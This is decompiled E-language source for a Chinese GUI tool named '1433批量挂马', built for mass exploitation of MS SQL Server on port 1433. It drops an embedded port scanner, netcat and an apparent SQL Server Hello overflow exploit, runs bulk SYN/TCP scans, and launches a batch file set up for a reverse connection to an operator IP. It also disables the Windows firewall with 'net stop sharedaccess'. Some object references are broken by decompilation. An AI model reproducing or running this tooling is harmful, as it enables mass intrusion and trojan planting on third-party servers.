 ' 文件类型：Windows窗口程序

 ' 程序名称：1433批量挂马
 ' 程序描述：
 ' 程序作者：(_t
 ' 邮政编码：133300
 ' 联系地址：吉林延边
 ' 联系电话：
 ' 传真号码：
 ' 电子信箱：ekinwxm@126.com
 ' 主页地址：www.very4f.com
 ' 版权声明：
 ' 版本号：1.0
 ' 创建号：0.0

窗口 _启动窗口 ' 在程序启动后自动调入本窗口
    左边 = 50
    顶边 = 50
    宽度 = 344
    高度 = 437
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 真
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 假
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 空
    图标 =  ' 已保存到：D:\易语言学习\Data\1433.e\_启动窗口_图标.ico
    背景音乐 =  ' 空
    标题 = “1433批量自动溢出2版-制作QQ:465577 ”
    帮助文件名 = “”

窗口 窗口1
    左边 = 50
    顶边 = 50
    宽度 = 270
    高度 = 240
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 空
    图标 =  ' 已保存到：D:\易语言学习\Data\1433.e\窗口1_图标.ico
    背景音乐 =  ' 已保存到：D:\易语言学习\Data\1433.e\窗口1_背景音乐
    标题 = “”
    帮助文件名 = “”



.常量 SW_HIDE, "0", , 
.常量 STARTF_USESHOWWINDOW, "1", , 
.常量 STARTF_USESTDHANDLES, "256", , 
.常量 STILL_ACTIVE, "259", , 
.图片 S, " ' 已保存到：D:\易语言学习\Data\1433.e\S", , 
.图片 sqlhello, " ' 已保存到：D:\易语言学习\Data\1433.e\sqlhello", , 
.图片 NC, " ' 已保存到：D:\易语言学习\Data\1433.e\NC", , 
.图片 FTP, " ' 已保存到：D:\易语言学习\Data\1433.e\FTP", , 
.图片 zhengli, " ' 已保存到：D:\易语言学习\Data\1433.e\zhengli", , 
.图片 NCTXT, " ' 已保存到：D:\易语言学习\Data\1433.e\NCTXT", , 
.图片 NCBAT, " ' 已保存到：D:\易语言学习\Data\1433.e\NCBAT", , 
.图片 SQL, " ' 已保存到：D:\易语言学习\Data\1433.e\SQL", , 


 ' 所需要的支持库：
 ' krnln d09f2340818511d396f6aaf844c7e325 4 4 系统核心支持库
 ' iext2 AF6AD80AA4244A59AFB3D83ECF5173CC 1 1 扩展界面支持库二
 ' iext 27bb20fdd3e145e4bee3db39ddd6e64c 1 2 扩展界面支持库一
 ' eAPI F7FC1AE45C5C4758AF03EF19F18A395D 1 1 应用接口支持库




.全局变量 FTP信息, 文本型, , , 
.全局变量 扫描, 逻辑型, , , 

.窗口程序集 窗口程序集1, , , 

.子程序 win2k扫描, 空白型, , 
运行 (相加 (“s.exe”, “ ”, “SYN”, “ ”, ., “ ”, ., “ ”, .内容, “ ”, “/save”), 假, )

.子程序 _按钮1_被单击, 空白型, , 
.如果真 (等于 (信息框 (“请确认已经设置好了端口,SYN模式扫描开始”, 相加 (#确认取消钮, #信息图标), ), #确认钮))
    win2k扫描 ()
.如果真结束


.子程序 __启动窗口_创建完毕, 空白型, , 
赋值 (_启动窗口., “1433批量自动溢出2版-制作QQ:465577”)
写到文件 (相加 (取运行目录 (), “\s.exe”), #S)
写到文件 (相加 (取运行目录 (), “\NC.exe”), #NC)
写到文件 (相加 (取运行目录 (), “\sqlhello.exe”), #sqlhello)
 ' 写到文件 (取运行目录 () ＋ “\ftp.ini”, #FTP)

.子程序 _按钮2_被单击, 空白型, , 
.如果真 (等于 (信息框 (“请确认已经设置好了端口,TCP模式扫描开始”, 相加 (#确认取消钮, #信息图标), ), #确认钮))
    XP系统扫描 ()
.如果真结束


.子程序 XP系统扫描, 空白型, , 
运行 (相加 (“s.exe”, “ ”, “TCP”, “ ”, ., “ ”, ., “ ”, .内容, “ ”, .内容, “/save”), 假, )

.子程序 _按钮3_被单击, 空白型, , 
.判断开始 (文件是否存在 (相加 (取运行目录 (), “\1433.txt”)))
    赋值 (.内容, 到文本 (读入文件 (相加 (取运行目录 (), “\1433.txt”))))
    
.默认
    赋值 (.内容, “”)
    信息框 (“您没有进行整理,无法查看结果”, 相加 (#错误图标, #信息图标), )
.判断结束


.子程序 _按钮4_被单击, 空白型, , 
.如果真 (等于 (信息框 (“请确认是否真的要清理掉已扫描的结果”, 相加 (#确认取消钮, #信息图标), ), #确认钮))
    删除文件 (“result.txt”)
.如果真结束


.子程序 _按钮5_被单击, 空白型, , 
.如果真 (等于 (信息框 (相加 (“将s扫描后的结果文件整理.如果扫描的IP段比较长,请等待文件1433.txt的成功生成后在进行下一步操作”, #换行符, #换行符, “确认整理吗?”), 相加 (#确认取消钮, #询问图标), ), #确认钮))
    写到文件 (相加 (取运行目录 (), “\zhengli.bat”), #zhengli)
    运行 (相加 (取运行目录 (), “\zhengli.bat”), 真, 1)
.如果真结束
删除文件 (“zhengli.bat”)

.子程序 _按钮6_被单击, 空白型, , 
载入 (窗口1, , 真)

.子程序 _按钮7_被单击, 空白型, , 
.判断开始 (文件是否存在 (相加 (取运行目录 (), “\NC.txt”)))
    NC ()
.默认
    写到文件 (相加 (取运行目录 (), “\NC.txt”), #NCTXT)
.判断结束


.子程序 NC, 空白型, , 
.判断开始 (文件是否存在 (相加 (取运行目录 (), “\NC.bat”)))
    运行 (相加 (取运行目录 (), “\nc.bat”), 假, )
.默认
    写到文件 (相加 (取运行目录 (), “\NC.bat”), #NCBAT)
    运行 (相加 (取运行目录 (), “\nc.bat”), 假, )
.判断结束


.子程序 _按钮8_被单击, 空白型, , 
.判断开始 (文件是否存在 (相加 (取运行目录 (), “\sql.bat”)))
    
.默认
    写到文件 (相加 (取运行目录 (), “\sql.bat”), #SQL)
    运行 (相加 (取运行目录 (), “\sql.bat”), 假, )
.判断结束
.如果真 (等于 (信息框 (“请确认是否已经修改好了SQL.bat里的IP和反向连接端口”, 相加 (#确认取消钮, #信息图标), ), #确认钮))
    运行 (相加 (取运行目录 (), “\sql.bat”), 假, )
.如果真结束



.子程序 __启动窗口_可否被关闭, 逻辑型, , 
删除文件 (相加 (取运行目录 (), “\s.exe”))
删除文件 (相加 (取运行目录 (), “\NC.exe”))
删除文件 (相加 (取运行目录 (), “\sqlhello.exe”))
未知支持库函数_11 (“s.exe”)
未知支持库函数_11 (“cmd.exe”)

.子程序 _选择框1_被单击, 空白型, , 
.判断开始 (等于 (.选中, 真))
    运行 (“net stop sharedaccess”, 假, 1) ' 关闭防火墙，并隐藏cmd的窗口
.默认
    运行 (“net start sharedaccess”, 假, 1) ' 这个是启动防火墙,你不用工具了就把它打开
.判断结束



 ' 不属于任何一个程序集、类模块的函数：
